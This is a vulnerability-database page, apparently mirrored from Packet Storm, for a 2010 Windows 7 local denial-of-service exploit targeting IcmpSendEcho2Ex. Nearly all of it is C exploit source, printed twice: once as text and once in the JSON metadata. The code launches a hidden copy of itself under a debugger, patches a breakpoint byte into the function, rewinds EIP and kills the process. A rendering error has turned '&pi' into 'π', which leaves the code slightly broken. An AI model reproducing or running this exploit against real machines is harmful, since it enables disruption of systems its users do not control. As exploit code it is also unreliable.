Search...

Microsoft Windows IcmpSendEcho2Ex Denial Of Service

2010-08-24T00:00:00

ID PACKETSTORM:92991
Type packetstorm
Reporter l3D
Modified 2010-08-24T00:00:00

Description

                                        
                                            `/*  
Microsoft Windows DoS (IcmpSendEcho2Ex interrupting)  
Author: l3D  
Sites: http://nullbyte.org.il, http://forums.hacking.org.il  
IRC: irc://irc.nix.co.il/#security  
Email: pupipup33@gmail.com  
Tested on Windows 7  
  
Microsoft Windows operating system is prone to a local DoS by interrupting the function IcmpSendEcho2Ex.  
The IP address argument should be a non-exist IP address on the net, so the function will wait longer time.  
*/  
#include &lt;stdio.h&gt;  
#include &lt;windows.h&gt;  
#include &lt;iphlpapi.h&gt;  
#include &lt;winsock2.h&gt;  
  
#pragma comment(lib, "iphlpapi.lib")  
#pragma comment(lib, "ws2_32.lib")  
  
#define PARAM 0xDEADBEEF  
  
void Terminate(HANDLE hProcess){  
Sleep(150);  
TerminateProcess(hProcess, -1);  
}  
  
int main(int argc, char **argv){  
if( argc&lt;2){  
printf("Usage: %s &lt;ip address&gt;\n", argv[0]);  
return 1;  
}  
  
if( IsDebuggerPresent()){  
HANDLE iphlpapi=LoadLibrary("iphlpapi.dll");  
if( !iphlpapi){  
perror("iphlpapi.dll");  
return 1;  
}  
FARPROC IcmpSendEcho=GetProcAddress(iphlpapi, "IcmpSendEcho");  
FARPROC IcmpCreateFile=GetProcAddress(iphlpapi, "IcmpCreateFile");  
FARPROC IcmpCloseHandle=GetProcAddress(iphlpapi, "IcmpCloseHandle");  
if( (IcmpSendEcho && IcmpCreateFile && IcmpCloseHandle)==0){  
perror("icmp functions");  
return 1;  
}  
  
unsigned long ipaddr=INADDR_NONE, params[2];  
HANDLE hIcmpFile;  
char data[32], *reply;  
int replySize=sizeof(ICMP_ECHO_REPLY)+sizeof(data);  
  
if( (ipaddr=inet_addr(argv[1]))==INADDR_NONE){  
perror("Illegal IP address!");  
return 1;  
}  
  
if( (hIcmpFile=(HANDLE)IcmpCreateFile())==INVALID_HANDLE_VALUE){  
perror("IcmpCreateFile");  
return 1;  
}  
  
reply=(char *)malloc(replySize);  
ZeroMemory(data, sizeof(data));  
params[0]=PARAM;  
params[1]=(unsigned long)GetProcAddress(iphlpapi, "IcmpSendEcho2Ex");  
  
RaiseException(EXCEPTION_BREAKPOINT, 0, 2, params);  
puts("Exception raised!");  
IcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000);  
puts("This line should never be shown...");  
IcmpCloseHandle(hIcmpFile);  
return 0;  
}  
  
PROCESS_INFORMATION pi;  
STARTUPINFO si;  
HANDLE hProcess, hThread;  
DEBUG_EVENT debugEvent;  
EXCEPTION_RECORD *ExceptionRecord=&debugEvent.u.Exception.ExceptionRecord;  
CONTEXT context;  
FARPROC IcmpSendEcho2Ex=NULL;  
char path[256], args[512], originalByte[1];  
  
ZeroMemory(π, sizeof(PROCESS_INFORMATION));  
ZeroMemory(&si, sizeof(STARTUPINFO));  
ZeroMemory(&debugEvent, sizeof(DEBUG_EVENT));  
ZeroMemory(&context, sizeof(CONTEXT));  
ZeroMemory(path, sizeof(path));  
ZeroMemory(args, sizeof(args));  
si.cb=sizeof(STARTUPINFO);  
si.dwFlags=STARTF_USESHOWWINDOW;  
si.wShowWindow=SW_HIDE;  
context.ContextFlags=CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;  
  
GetModuleFileName(NULL, path, sizeof(path)-1);  
snprintf(args, sizeof(args)-1, "%s %s", path, argv[1]);  
  
if( !CreateProcess(  
NULL,  
args,  
NULL,  
NULL,  
FALSE,  
DEBUG_PROCESS,  
NULL,  
NULL,  
&si,  
π  
)){  
perror("CreateProcess");  
return 1;  
}  
  
if( (hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId))==NULL){  
perror("OpenProcess");  
return 1;  
}  
  
HANDLE kernel32=LoadLibrary("kernel32.dll");  
FARPROC DebugSetProcessKillOnExit=GetProcAddress(kernel32, "DebugSetProcessKillOnExit");  
FARPROC DebugActiveProcessStop=GetProcAddress(kernel32, "DebugActiveProcessStop");  
FARPROC OpenThread=GetProcAddress(kernel32, "OpenThread");  
CloseHandle(kernel32);  
DebugSetProcessKillOnExit(TRUE);  
  
while(WaitForDebugEvent(&debugEvent, INFINITE) && debugEvent.dwDebugEventCode!=EXIT_PROCESS_DEBUG_EVENT){  
if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT && ExceptionRecord-&gt;ExceptionCode==EXCEPTION_BREAKPOINT){  
if( ExceptionRecord-&gt;NumberParameters&gt;1 && ExceptionRecord-&gt;ExceptionInformation[0]==PARAM){  
IcmpSendEcho2Ex=(FARPROC)ExceptionRecord-&gt;ExceptionInformation[1];  
printf("IcmpSendEcho2Ex %p\n", IcmpSendEcho2Ex);  
if( !BreakpointSet(hProcess, IcmpSendEcho2Ex, &originalByte)){  
perror("BreakpointSet");  
break;  
}  
}  
else if( ExceptionRecord-&gt;ExceptionAddress==IcmpSendEcho2Ex){  
printf("EIP %p\n", IcmpSendEcho2Ex);  
if( !BreakpointRetrieve(hProcess, IcmpSendEcho2Ex, &originalByte)){  
perror("BreakpointRetrieve");  
break;  
}  
if((hThread=(HANDLE)OpenThread(THREAD_ALL_ACCESS, FALSE, debugEvent.dwThreadId))==NULL) puts("OpenThread");  
if(!GetThreadContext(hThread, &context)) puts("GetThreadContext");  
context.Eip -= 1;  
if(!SetThreadContext(hThread, &context)) puts("SetThreadContext");  
CreateThread(NULL, 0, (void *)Terminate, hProcess, 0, NULL);  
}  
}  
else if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT){  
puts("Exception!");  
DebugActiveProcessStop(debugEvent.dwProcessId);  
break;  
}  
ContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE);  
ZeroMemory(&debugEvent, sizeof(DEBUG_EVENT));  
}  
  
return 0;  
}  
  
BOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte){  
unsigned long oldProtect;  
if(  
VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) &&  
ReadProcessMemory(hProcess, addr, originalByte, 1, NULL) &&  
WriteProcessMemory(hProcess, addr, "\xCC", 1, NULL) &&  
VirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect))  
return TRUE;  
else return FALSE;  
}  
  
BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){  
unsigned long oldProtect;  
if(  
VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) &&  
WriteProcessMemory(hProcess, addr, originalByte, 1, NULL) &&  
VirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect))  
return TRUE;  
else return FALSE;  
}  
  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2010-08-24T00:00:00", "reporter": "l3D", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b912e3f22b6de23db55f8623f1b6633c"}, {"key": "modified", "hash": "b6028155e9851a008863f3ee4fb15eaa"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b6028155e9851a008863f3ee4fb15eaa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3e9e551df6611bc050fd13f37769723e"}, {"key": "sourceData", "hash": "0ed6b43759a2d14b7c127c65ebfcb5e9"}, {"key": "sourceHref", "hash": "2e40db38b45a2159022a08e08ae0d2b5"}, {"key": "title", "hash": "147300b688f61bd3f0d80232c888d75d"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`/* \nMicrosoft Windows DoS (IcmpSendEcho2Ex interrupting) \nAuthor: l3D \nSites: http://nullbyte.org.il, http://forums.hacking.org.il \nIRC: irc://irc.nix.co.il/#security \nEmail: pupipup33@gmail.com \nTested on Windows 7 \n \nMicrosoft Windows operating system is prone to a local DoS by interrupting the function IcmpSendEcho2Ex. \nThe IP address argument should be a non-exist IP address on the net, so the function will wait longer time. \n*/ \n#include <stdio.h> \n#include <windows.h> \n#include <iphlpapi.h> \n#include <winsock2.h> \n \n#pragma comment(lib, \"iphlpapi.lib\") \n#pragma comment(lib, \"ws2_32.lib\") \n \n#define PARAM 0xDEADBEEF \n \nvoid Terminate(HANDLE hProcess){ \nSleep(150); \nTerminateProcess(hProcess, -1); \n} \n \nint main(int argc, char **argv){ \nif( argc<2){ \nprintf(\"Usage: %s <ip address>\\n\", argv[0]); \nreturn 1; \n} \n \nif( IsDebuggerPresent()){ \nHANDLE iphlpapi=LoadLibrary(\"iphlpapi.dll\"); \nif( !iphlpapi){ \nperror(\"iphlpapi.dll\"); \nreturn 1; \n} \nFARPROC IcmpSendEcho=GetProcAddress(iphlpapi, \"IcmpSendEcho\"); \nFARPROC IcmpCreateFile=GetProcAddress(iphlpapi, \"IcmpCreateFile\"); \nFARPROC IcmpCloseHandle=GetProcAddress(iphlpapi, \"IcmpCloseHandle\"); \nif( (IcmpSendEcho && IcmpCreateFile && IcmpCloseHandle)==0){ \nperror(\"icmp functions\"); \nreturn 1; \n} \n \nunsigned long ipaddr=INADDR_NONE, params[2]; \nHANDLE hIcmpFile; \nchar data[32], *reply; \nint replySize=sizeof(ICMP_ECHO_REPLY)+sizeof(data); \n \nif( (ipaddr=inet_addr(argv[1]))==INADDR_NONE){ \nperror(\"Illegal IP address!\"); \nreturn 1; \n} \n \nif( (hIcmpFile=(HANDLE)IcmpCreateFile())==INVALID_HANDLE_VALUE){ \nperror(\"IcmpCreateFile\"); \nreturn 1; \n} \n \nreply=(char *)malloc(replySize); \nZeroMemory(data, sizeof(data)); \nparams[0]=PARAM; \nparams[1]=(unsigned long)GetProcAddress(iphlpapi, \"IcmpSendEcho2Ex\"); \n \nRaiseException(EXCEPTION_BREAKPOINT, 0, 2, params); \nputs(\"Exception raised!\"); \nIcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000); \nputs(\"This line should never be shown...\"); \nIcmpCloseHandle(hIcmpFile); \nreturn 0; \n} \n \nPROCESS_INFORMATION pi; \nSTARTUPINFO si; \nHANDLE hProcess, hThread; \nDEBUG_EVENT debugEvent; \nEXCEPTION_RECORD *ExceptionRecord=&debugEvent.u.Exception.ExceptionRecord; \nCONTEXT context; \nFARPROC IcmpSendEcho2Ex=NULL; \nchar path[256], args[512], originalByte[1]; \n \nZeroMemory(\u03c0, sizeof(PROCESS_INFORMATION)); \nZeroMemory(&si, sizeof(STARTUPINFO)); \nZeroMemory(&debugEvent, sizeof(DEBUG_EVENT)); \nZeroMemory(&context, sizeof(CONTEXT)); \nZeroMemory(path, sizeof(path)); \nZeroMemory(args, sizeof(args)); \nsi.cb=sizeof(STARTUPINFO); \nsi.dwFlags=STARTF_USESHOWWINDOW; \nsi.wShowWindow=SW_HIDE; \ncontext.ContextFlags=CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS; \n \nGetModuleFileName(NULL, path, sizeof(path)-1); \nsnprintf(args, sizeof(args)-1, \"%s %s\", path, argv[1]); \n \nif( !CreateProcess( \nNULL, \nargs, \nNULL, \nNULL, \nFALSE, \nDEBUG_PROCESS, \nNULL, \nNULL, \n&si, \n\u03c0 \n)){ \nperror(\"CreateProcess\"); \nreturn 1; \n} \n \nif( (hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId))==NULL){ \nperror(\"OpenProcess\"); \nreturn 1; \n} \n \nHANDLE kernel32=LoadLibrary(\"kernel32.dll\"); \nFARPROC DebugSetProcessKillOnExit=GetProcAddress(kernel32, \"DebugSetProcessKillOnExit\"); \nFARPROC DebugActiveProcessStop=GetProcAddress(kernel32, \"DebugActiveProcessStop\"); \nFARPROC OpenThread=GetProcAddress(kernel32, \"OpenThread\"); \nCloseHandle(kernel32); \nDebugSetProcessKillOnExit(TRUE); \n \nwhile(WaitForDebugEvent(&debugEvent, INFINITE) && debugEvent.dwDebugEventCode!=EXIT_PROCESS_DEBUG_EVENT){ \nif( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT && ExceptionRecord->ExceptionCode==EXCEPTION_BREAKPOINT){ \nif( ExceptionRecord->NumberParameters>1 && ExceptionRecord->ExceptionInformation[0]==PARAM){ \nIcmpSendEcho2Ex=(FARPROC)ExceptionRecord->ExceptionInformation[1]; \nprintf(\"IcmpSendEcho2Ex %p\\n\", IcmpSendEcho2Ex); \nif( !BreakpointSet(hProcess, IcmpSendEcho2Ex, &originalByte)){ \nperror(\"BreakpointSet\"); \nbreak; \n} \n} \nelse if( ExceptionRecord->ExceptionAddress==IcmpSendEcho2Ex){ \nprintf(\"EIP %p\\n\", IcmpSendEcho2Ex); \nif( !BreakpointRetrieve(hProcess, IcmpSendEcho2Ex, &originalByte)){ \nperror(\"BreakpointRetrieve\"); \nbreak; \n} \nif((hThread=(HANDLE)OpenThread(THREAD_ALL_ACCESS, FALSE, debugEvent.dwThreadId))==NULL) puts(\"OpenThread\"); \nif(!GetThreadContext(hThread, &context)) puts(\"GetThreadContext\"); \ncontext.Eip -= 1; \nif(!SetThreadContext(hThread, &context)) puts(\"SetThreadContext\"); \nCreateThread(NULL, 0, (void *)Terminate, hProcess, 0, NULL); \n} \n} \nelse if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT){ \nputs(\"Exception!\"); \nDebugActiveProcessStop(debugEvent.dwProcessId); \nbreak; \n} \nContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE); \nZeroMemory(&debugEvent, sizeof(DEBUG_EVENT)); \n} \n \nreturn 0; \n} \n \nBOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte){ \nunsigned long oldProtect; \nif( \nVirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) && \nReadProcessMemory(hProcess, addr, originalByte, 1, NULL) && \nWriteProcessMemory(hProcess, addr, \"\\xCC\", 1, NULL) && \nVirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect)) \nreturn TRUE; \nelse return FALSE; \n} \n \nBOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){ \nunsigned long oldProtect; \nif( \nVirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) && \nWriteProcessMemory(hProcess, addr, originalByte, 1, NULL) && \nVirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect)) \nreturn TRUE; \nelse return FALSE; \n} \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:19:27", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/92991/Microsoft-Windows-IcmpSendEcho2Ex-Denial-Of-Service.html", "sourceHref": "https://packetstormsecurity.com/files/download/92991/mswinicmp-dos.txt", "title": "Microsoft Windows IcmpSendEcho2Ex Denial Of Service", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "references": [], "id": "PACKETSTORM:92991", "hash": "c57bcc281af5826641e2c84022aad52478c2e7efb953166244eb3b542b6c97be", "edition": 1, "cvelist": [], "modified": "2010-08-24T00:00:00", "description": ""}